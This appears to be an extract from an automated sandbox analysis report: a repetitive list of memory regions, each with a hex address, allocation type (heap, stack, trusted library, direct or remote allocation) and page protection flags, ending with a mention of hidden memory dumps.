direct allocation
page read and write
267278BB000
trusted library allocation
page read and write
E63A9FE000
stack
page read and write
26650000
trusted library allocation
page execute and read and write
CDE000
stack
page read and write
20B02B3A000
heap
page read and write
26610000
trusted library allocation
page read and write
7FFAAC640000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
E63A6FE000
stack
page read and write
265F0000
trusted library allocation
page read and write
26725720000
heap
page read and write
25980000
trusted library allocation
page read and write
948B000
trusted library allocation
page read and write
8420000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
6E5B000
stack
page read and write
266D0000
trusted library allocation
page read and write
20B02AC6000
heap
page read and write
7FFB1A755000
unkown
page readonly
20B02A5E000
heap
page read and write
74A0000
trusted library allocation
page read and write
24780FF000
stack
page read and write
25C4E000
heap
page read and write
943B000
trusted library allocation
page read and write
23670000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
2672915A000
trusted library allocation
page read and write
46EE000
stack
page read and write
70470000
unkown
page readonly
41A000
trusted library allocation
page execute and read and write
2477EFC000
stack
page read and write
26610000
trusted library allocation
page read and write
20B02B15000
heap
page read and write
732D000
stack
page read and write
25980000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
85EC000
stack
page read and write
26610000
trusted library allocation
page read and write
570000
heap
page read and write
E63B64B000
stack
page read and write
25EA0000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
20B02ACD000
heap
page read and write
25980000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
258AD000
trusted library allocation
page read and write
B0E000
stack
page read and write
258D6000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
25990000
trusted library allocation
page read and write
CD8000
heap
page read and write
7FFAAC470000
trusted library allocation
page execute and read and write
26725765000
heap
page read and write
266C0000
trusted library allocation
page read and write
267293DC000
trusted library allocation
page read and write
20B00B20000
heap
page read and write
5BE000
heap
page read and write
266E0000
trusted library allocation
page execute and read and write
25886000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
C14000
trusted library allocation
page read and write
4990000
direct allocation
page read and write
26700000
trusted library allocation
page read and write
914E000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
2649E000
stack
page read and write
20B02931000
heap
page read and write
59EB000
trusted library allocation
page read and write
24A19000
trusted library allocation
page read and write
267291EF000
trusted library allocation
page read and write
C3A000
trusted library allocation
page execute and read and write
26726FE0000
heap
page read and write
24AF0000
trusted library allocation
page read and write
7FFB1A731000
unkown
page execute read
5709000
remote allocation
page execute and read and write
20B02956000
heap
page read and write
266F0000
trusted library allocation
page read and write
26640000
trusted library allocation
page read and write
23AA9000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
23B31000
trusted library allocation
page read and write
236C0000
heap
page read and write
6E1D000
stack
page read and write
25980000
trusted library allocation
page read and write
7FFB1A730000
unkown
page readonly
265F0000
trusted library allocation
page read and write
20B029A6000
heap
page read and write
258C0000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
25CB8000
heap
page read and write
851E000
stack
page read and write
20B02BAE000
heap
page read and write
25E9E000
stack
page read and write
B60000
heap
page read and write
26640000
trusted library allocation
page read and write
25B00000
trusted library allocation
page read and write
C50000
heap
page read and write
26610000
trusted library allocation
page read and write
23680000
trusted library allocation
page read and write
23540000
remote allocation
page read and write
235BF000
stack
page read and write
23AB3000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
BE0000
direct allocation
page read and write
7FFAAC540000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
2661F000
trusted library allocation
page read and write
7FFAAC500000
trusted library allocation
page read and write
24782FF000
stack
page read and write
7021000
heap
page read and write
20B02AB6000
heap
page read and write
20B02B45000
heap
page read and write
49B0000
direct allocation
page read and write
235D0000
direct allocation
page read and write
8231000
heap
page read and write
2673F8D0000
heap
page read and write
81E0000
heap
page read and write
239C9000
trusted library allocation
page read and write
26727850000
trusted library allocation
page read and write
7203000
heap
page read and write
7FFAAC2BD000
trusted library allocation
page execute and read and write
826B000
heap
page read and write
C00000
direct allocation
page read and write
7490000
trusted library allocation
page read and write
20B02B15000
heap
page read and write
25B10000
heap
page execute and read and write
2E6E000
stack
page read and write
2672916D000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
2672787E000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
7FFAAC465000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
7FFAAC510000
trusted library allocation
page read and write
26727020000
trusted library allocation
page read and write
25AFD000
stack
page read and write
265F0000
trusted library allocation
page read and write
239C1000
trusted library allocation
page read and write
4B39000
trusted library allocation
page read and write
20B02A8F000
heap
page read and write
26610000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
B90000
direct allocation
page read and write
25980000
trusted library allocation
page read and write
26640000
trusted library allocation
page read and write
26727060000
trusted library allocation
page read and write
E8E000
stack
page read and write
25980000
trusted library allocation
page read and write
266C0000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
20B02BAF000
heap
page read and write
23AB8000
trusted library allocation
page read and write
25CD0000
heap
page read and write
23924000
trusted library allocation
page read and write
547000
heap
page read and write
20B02B13000
heap
page read and write
25980000
trusted library allocation
page read and write
26640000
trusted library allocation
page read and write
26710000
trusted library allocation
page read and write
8218000
heap
page read and write
258F0000
heap
page read and write
25980000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
B69000
heap
page read and write
4C0000
heap
page read and write
E63A67E000
stack
page read and write
7FFAAC600000
trusted library allocation
page read and write
20B02B80000
heap
page read and write
20B00B8F000
heap
page read and write
7FFAAC5D0000
trusted library allocation
page read and write
20B02C02000
heap
page read and write
C80000
heap
page read and write
20B02B31000
heap
page read and write
26610000
trusted library allocation
page read and write
7110000
heap
page read and write
26610000
trusted library allocation
page read and write
47F0000
heap
page read and write
B65000
heap
page read and write
239FB000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
20B00D40000
heap
page read and write
5EF000
heap
page read and write
5F5000
heap
page read and write
20B00C3F000
heap
page read and write
9148000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
412000
trusted library allocation
page read and write
D5D000
stack
page read and write
265F0000
trusted library allocation
page read and write
258A1000
trusted library allocation
page read and write
20B02949000
heap
page read and write
26610000
trusted library allocation
page read and write
2673F9F8000
heap
page read and write
85F0000
trusted library allocation
page read and write
24A63000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
4B0000
heap
page read and write
239F9000
trusted library allocation
page read and write
There are 1172 hidden memdumps, click here to show them.